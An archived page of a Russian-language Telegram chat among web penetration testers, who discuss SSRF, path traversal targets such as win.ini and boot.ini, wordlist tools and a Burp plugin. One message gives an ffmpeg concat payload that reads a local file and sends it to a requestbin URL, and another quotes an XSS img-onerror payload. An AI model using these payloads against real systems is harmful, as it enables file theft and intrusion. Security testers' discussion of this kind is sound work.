Телеграмм чат группы WebPwnChat страница 2450

не, у меня тут напрямую, ssrf

14:28пожаловаться #1

MortusKill in WebPwnChat

Раз уж тут про Swissky заговорили, то у него есть в разделе PathTraversal - список дефолтныз виндовых файлов

14:28пожаловаться #2

Billy Fox in WebPwnChat

Но ты учти что если ты не в ц томе то тогда особо это не поможет против ssrf

14:28пожаловаться #3

MortusKill

Раз уж тут про Swissky заговорили, то у него есть в разделе PathTraversal - список дефолтныз виндовых файлов

а, блин, капец, я не в том разделе смотрел, спасибо) помню же что видел

14:29пожаловаться #4

MortusKill in WebPwnChat

Andrew Sparks

а, блин, капец, я не в том разделе смотрел, спасибо) помню же что видел

Но вообще классикой конечно считается:
C:\Windows\win.ini
Странно, что в списке сверху его нет

14:31пожаловаться #5

И system32 в корне как бы не то

https://twitter.com/qtc_de/status/1262375734921908224

14:32пожаловаться #6

PP in WebPwnChat

Twitter

Tobias Neitzel

We got BAppccepted 🥳 From now on you can install our useful CSTC extension directly inside #BurpSuite using the BApp Store. Enjoy! :D

MAGIC нету, расходимся...........

14:32пожаловаться #7

Pulsar in WebPwnChat

там сверху линк откуда взяты пути - слепое чтение.
может эт не совсем то, что нужно

14:33пожаловаться #8

Pulsar in WebPwnChat

только сейчас представил как это звучит - слепое чтение

14:33пожаловаться #9

Pulsar

только сейчас представил как это звучит - слепое чтение

Брайль перевернулся в гробу

14:34пожаловаться #10

эх, чет не работает, пытаюсь ffmpeg проэксплутировать,

concat:http://requestbin.net/r/*******?f=|file:///boot.ini

не работает, приходит пустой f=

14:37пожаловаться #11

кучу нагрузок сувал уже, что еще можно попробовать?

14:37пожаловаться #12

В корне install.log посмотри ( часто в корне других дисков наблюдал) если ты не на том диске или вебдиры. А он пути из переменных не воспринимает ? %temp% ?

14:45пожаловаться #13

I S

env которые

A tool which scrapes public github repositories for common naming conventions in variables, folders and files - adamtlangley/gitscraper

14:46пожаловаться #14

S N in WebPwnChat

https://github.com/adamtlangley/gitscraper/ кто еще знает кроме этого и seclists и fuzzdb чтобы листы были?

GitHub

adamtlangley/gitscraper

Элайджи Камски... in WebPwnChat

14:51пожаловаться #15

ЭК

В бурп дбавили КиберШеф плагин официально

Это что?

https://gchq.github.io/CyberChef/

15:33пожаловаться #16

PP in WebPwnChat

gchq.github.io

CyberChef

The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis

15:34пожаловаться #17

PP in WebPwnChat

Это удобненько

15:34пожаловаться #18

Denis in WebPwnChat

Но какой смысл без magic было делать не понятно( зачем нужен ещё один декодер

15:37пожаловаться #19

medalahonor in WebPwnChat

Почему пейлоады вроде <img src=1 onerror=&#097lert() /> вообще триггерят xss? Это часть стандарта HTML или приблуды браузеров? Потому что такие вещи не работают внутри тега script, так как, согласно html, всё, что внутри этого тега, считается обычным текстом и просто передается как есть в парсер javascript.